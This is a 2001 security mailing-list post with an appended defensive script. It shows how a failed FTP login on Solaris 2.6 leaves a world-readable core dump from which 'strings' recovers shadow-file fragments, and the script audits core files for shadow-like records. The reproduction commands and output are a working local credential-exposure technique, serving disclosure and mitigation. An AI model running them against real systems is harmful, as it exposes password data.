From: Warning3 (warning3MAIL.COM)
Date: Tue Apr 17 2001 - 01:44:49 CDT

    Yes. It is possible that a local user can get part of the shadow file in
    Solaris 2.6, since the core file is world readable.

    [root /usr/sbin]> telnet localhost 21
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    220 sun26 FTP server (SunOS 5.6) ready.
    user warning3
    331 Password required for warning3. <-- a valid username
    pass blahblah <--- a wrong password
    530 Login incorrect.
    CWD ~
    530 Please login with USER and PASS.
    Connection closed by foreign host.
    [root /usr/sbin]> ls -l /core
    -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
    [root /usr/sbin]> strings /core|more
    [...snip...]
    lp:NP:6445::::::
    P:64
    eH::::
    uucp:NP:6445:::
    [...snip...]

    ---Original Message---
    [...snip...]
    >
    >However, this can present other problems, so you should ensure that core
    >dumps are disabled for inetd (add "ulimit -c 0" before starting inetd in
    >/etc/init.d/inetsvc) or at least that they are not world readable (add a
    >umask line); they are world readable by default under 2.6.
    >
    >--
    > ghandi / ghandimindless.com / www.dopesquad.net
    > "Bein' Crazy is the least of my worries." - Jack Kerouac
    > C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F

    Regards,
    Warning3 <warning3mail.com>
    http://www.nsfocus.com
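
A defender's check for the exposure shown in this message, added here as an example and not part of the original post: it lists world-readable files named `core` under a directory and counts the printable runs in each that look like shadow records, then shows the effect of the quoted `ulimit -c 0` and umask advice on a child process. The function names and the shadow-record pattern are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# Assumed pattern for a shadow-style record: name:password-field:lastchg
# followed by six more colon-separated numeric (or empty) fields.
SHADOW_RE='[A-Za-z_][A-Za-z0-9_.-]*:[^:]*:[0-9]*(:[0-9]*){5}:'

# count_shadow_lines FILE -> number of printable runs that look like shadow records.
count_shadow_lines() {
    # Turn every non-printable byte into a newline (a portable stand-in for
    # strings(1)), then count matching lines. grep exits 1 on zero matches,
    # so "|| true" keeps the function usable under "set -e".
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -Ec "$SHADOW_RE" || true
}

# audit_cores DIR -> one line per world-readable core file:
#   <path> shadow_like=<count>
audit_cores() {
    # -perm -004 selects files whose "other" read bit is set.
    find "$1" -type f -name core -perm -004 2>/dev/null |
    while IFS= read -r f; do
        printf '%s shadow_like=%s\n' "$f" "$(count_shadow_lines "$f")"
    done
}

# restrict_core FILE -> remove group/other access from an existing core file.
restrict_core() {
    chmod 600 "$1"
}

# Effect of the quoted advice: a process started after "ulimit -c 0" and a
# restrictive umask inherits both. Prints the core size limit the child sees.
inherited_core_limit() {
    ( ulimit -c 0; umask 077; sh -c 'ulimit -c' )
}

# Run the audit only when a directory is given, e.g.: sh audit.sh /
if [ $# -gt 0 ]; then
    audit_cores "$1"
fi
```

A count of zero does not mean a core file is harmless: the fragments in the `strings` output above show that records can be split across non-printable bytes.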